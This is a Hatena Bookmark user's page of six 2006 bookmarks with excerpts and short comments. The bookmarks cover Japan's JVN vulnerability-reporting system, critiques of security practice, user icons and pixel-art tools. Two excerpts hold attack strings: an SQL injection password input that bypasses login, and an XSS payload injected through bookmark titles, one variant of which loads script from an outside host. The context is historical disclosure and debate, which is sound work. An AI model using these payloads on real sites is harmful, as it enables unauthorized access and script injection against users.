タグ

関連タグで絞り込む (1)

タグの絞り込みを解除

hatenaとPCに関するMWAVEのブックマーク (6)

  • JVN のシステムの話 - naoyaのはてなダイアリー

    誰(どの組織)が書いたか不明(JVN編集者が書いているようにも読めなくもない)なのは、システムに問題があるのではないか。署名欄でも設けたらどうか。自由書式だからこういう輩が出てくるのだから、記入様式を用意したらいいのに。 それ書いたの僕なわけですが。 マニュアルとか、フォームのそばにある説明を見ても「CERT/CCへの情報提供(任意)」だっけかな、そんな一文が書いてるだけで何を書いたらいいか分からないのですよ。そこに書いて欲しい具体的な内容があるなら具体的にどういうことを書くかとか、そういうのがないと分からないですね。 あと、このシステムの位置づけというのがいまいち理解できてなかったり。(もちろん、脆弱性情報を安全な経路で教えていただけるのは大変ありがたいことです。 ) それを修正した後に僕らが JVN のシステムを使って決められたフォーマットであれやこれを入力するのは何かしらの義務なんで

    JVN のシステムの話 - naoyaのはてなダイアリー
    MWAVE
    MWAVE 2006/02/03
    他のベンダーだと「脆弱性の情報が書かれたURL」と「対応済みリリースへのURL」ぐらいは記載がありますね。
    リンク

  • 高木浩光@自宅の日記 - JVNはやっぱり駄目

    ■ 掲載されなかったamazon書評 1月14日の日記を書いた後、amazon.co.jpの当該書籍に書評を投稿した。amazon書評の投稿は初めてだったので、レビューガイドラインを読みながら書いたのだったが、残念ながら採用されなかったようだ。以下に投稿した文を掲載しておく。 セキュリティへの配慮が欠落した脆弱, 2006/1/15 レビュアー: 高木浩光 (東京都) - レビューをすべて見る このにはセキュリティ脆弱性を防止する観点が完全に欠落している。サンプルコードの大半にクロスサイトスクリプティング脆弱性があり、ログイン機能を作ってみせる例題では、典型的なSQLインジェクション脆弱性があって、パスワードに「'or'A'='A」と入力するだけで誰でも認証をスキップして不正ログインできてしまう。これらHTML出力、SQL文の構成に関する正しいコーディング手法は、後付けの「対策」とし

    MWAVE
    MWAVE 2006/02/03
    高木さんの、JVNとid:naoyaさんへの批判。
    リンク

  • はてなブックマークの超べんり機能 :: ぼくはまちちゃん!

    タイトルを↓みたいに編集すれば、ユーザーが自由にScriptつかえちゃうんだね! ぼく、ゆめがひろがりんぐです! "width=100 height=100 onmouseover=alert(String.fromCharCode(88,83,83)) ※最初にダブルクォート、最後に空白をひとついれる。 あ、人気エントリーのタイトルとか書き換えたらダメだよ…! えらいことになっちゃうかも? (追記) http://test/ ってurlのブックマークにテスト用のコードを置いてみたよ! タイトルが以下になってて hamachiya.com/h のscriptを呼び出す感じ。 (消しゴムに触れると呼び出されて、hamachiya.comをブックマークに追加してしまうという内容) "width=100 height=100 onmouseover=d=document;t=String; s=

  • http://hamachiya.com/h

    MWAVE
    MWAVE 2006/02/02
    これが悪の親玉か。
    リンク

  • plotless: はてブのユーザアイコンでSafariが激重に!?

    (2006.1.30: 追記です。はてなにより対策が施され、この記事に書かれている問題は解決しました。ありがとうございました。そしておつかれさまでした。>はてなの中の人) --- はてブにユーザアイコンが設定できるようになり、僕もなんとなく登録してみました。 ただ、この機能が追加されてからだと思うのですが、僕の環境 (MacOSX10.4, Safari) で挙動がおかしくなっています。 BLOG STATION:続・はてなブックマークが重くなってしまいそうな件について http://blog.goo.ne.jp/kanimaster/e/56a417d6d79c410afade86c0697061f5 を読む限り、パフォーマンスに大きな影響はなさそうだということなのですけども…。 以下に、どのような状態なのかを説明します。 たとえば、次のはてブのブクマエントリページにアクセスします。

    MWAVE
    MWAVE 2006/01/28
    はてなアイデアに登録した結果、この修正が行われました。http://i.hatena.ne.jp/idea/8252
    リンク

  • 16x16の戦い〜そしてどう森へ〜 - 煩悩是道場

    はてなみなさんもどうぶつの森で鍛えたドットぽちぽち技術で16x16プロフ界に華を添えて欲しいとゆうか、それをおれが見たいだけですとゆうか、かくしてブクマ界は速度・コメント力のみならず、絵心も問われる混迷の時代に突入したのです。ネコプロトコル - 16x16の戦いドット絵師でもなければ、どう森ユーザでもない私にとって、おおよそドット絵というのは鬼門である。しかし、そんな絵心のない私を救ってくれるソフトというものも、この世の中には存在する。それが『DotWork』だ。キャプチャ画像でおわかりのようにフォトショップのように直感的でわかりやすい画面構成で、サクサクとドット絵を作れる。来はFaviconという16x16の画像を作成する為のソフトなわけなのですが。プレビューを見ながら作れるので、単純なアイコンなら5分もかからずに作れてしまうと思う。ただ、残念な事にこちらのソフトで吐き出しされた画像を

    MWAVE
    MWAVE 2006/01/27
    16x16と60x60は別の画像にしたい。
    リンク
  • 1

お知らせ

もっと読む

公式Twitter

  • @HatenaBookmark

    リリース、障害情報などのサービスのお知らせ

  • @hatebu

    最新の人気エントリーの配信

はてなブックマーク

公式Twitter

はてなのサービス

  • App Storeからダウンロード
  • Google Playで手に入れよう
Copyright © 2005-2024 Hatena. All Rights Reserved.